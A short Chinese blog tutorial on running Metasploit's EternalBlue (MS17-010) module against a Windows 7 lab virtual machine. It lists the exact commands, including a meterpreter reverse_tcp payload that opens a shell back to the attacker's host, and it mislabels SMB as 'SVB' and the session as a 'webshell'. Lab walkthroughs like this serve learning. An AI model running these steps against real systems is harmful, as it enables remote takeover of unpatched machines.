MSF中的永恒之蓝


永恒之蓝漏洞

永恒之蓝漏洞是于2017年发布的漏洞,可以说是一个危害性很大的漏洞,不过在此漏洞发布后不久各大厂商都做出了相关的补丁,有兴趣的可以去360上查看补丁。而永恒之蓝漏洞利用的主要是SVB这个协议,而所利用的我们PC上的445端口(所以平常别乱开445有点危险-.-),这里由于我自己也不太明白漏洞原理,所以就只介绍漏洞的使用方法了。

首先,准备kali和Windows7的虚拟机(Windows2003,2008,xp都可以,但不要尽量装最新的杀毒软件),在kali’的终端输入msfconsole进入msf然后输入use exploit/windows/smb/ms17_010_eternalblue(不确定命令的正确性的话可以同tab补全),进入永恒之蓝的攻击页面,在进行攻击之前需要我们进行一些目标主机的设置和攻击者的设置,输入命令set RHOST 192.168.1.112(攻击目标IP),然后设置payload(攻击载荷,连接目标主机与本机的通道)命令如下:set payload windows/x64/meterpreter/reverse_tcp 调用攻击载荷,后设置攻击主机set lhost 192.168.1.113,后在命令行exploit发起攻击,攻击成功之后我们一般拿到的时system的权限,也就是最高权限,也就是说我们拿到了webshell。


文章作者: lemon-fan
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 lemon-fan !
 上一篇
vlan的了解 vlan的了解
vlan产生的原因在局域网中,由于我们的PC会经常性的发送广播,例如ARP广播,交换机的广播等等,我们的PC对于广播会直接接收,如果广播的内容对于我们自身的PC无用则会被丢弃,而如果一个局域网中连接的PC数量较多的话我们的PC则会运行直
2020-09-16 lemon-fan
下一篇 
基础知识补充 基础知识补充
路由在我们日常生活中总能听到路由器这个名讽刺,我们日常所用家用路由器实际上可以说是一个三层交换机(交换机和路由器的集合体),用企业的网络来说,最基本的网络由交换机和PC构成内网,再由路由器构成网关,而路由器则和外网连接,也就是说我们
2020-07-24
  目录